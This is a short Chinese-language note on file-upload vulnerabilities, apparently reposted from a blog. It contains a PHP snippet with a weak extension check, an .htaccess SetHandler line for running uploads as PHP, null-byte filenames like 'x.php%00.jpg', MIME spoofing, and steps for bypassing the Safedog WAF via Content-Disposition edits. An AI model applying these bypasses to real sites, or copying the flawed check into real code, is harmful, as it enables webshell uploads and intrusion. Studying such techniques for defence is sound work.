文件上传漏洞






$type = $_FILES['SC']['type'];
/*
if($type=="image/jpeg"){
  echo "success";
            }
  else{
    echo "fail";
    }
  echo $name;
*/

$namearray=explode(".",$name);
if($namearray[1]=="jpg"){
echo "success";
}
else{
echo "fail";
}

?>

.htaccess攻击

  (上传漏洞)
  (伪装后门)
   
    SetHandler application/x-httpd-php
   


%00截断上传 判断文件后缀  访问地址url问题

  www.xxx.com/qq.jpg
  www.xxx.com/qq.php%00.jpg
  filename="123.php%00.jpg"
  将 %00 进行编码


上传类型修改上传 判断文件类型 mime

  Content-Type:image/jpeg

js绕过上传

  时间长短判断,看源代码

安全狗上传bypass研究

  Xss漏洞原理及利用方法

上传数据包:

  Content-Disposition: form-data; name="upfile"; filename=x.php;

    Content-Type: image/jpeg

     Content-Disposition:

    Name:上传数据包参数名(不能修改)

    Filename:文件名

    Content-Type:文件类型信息

  1.修改filename值,去掉双引号加上分号(双引号去掉,不让他上传值,加分号就是表示没有结束,让狗继续匹配)

  2.删除Content-Disposition的值

 

转载于:https://www.cnblogs.com/China-Waukee/p/9642772.html

你可能感兴趣的:(文件上传漏洞)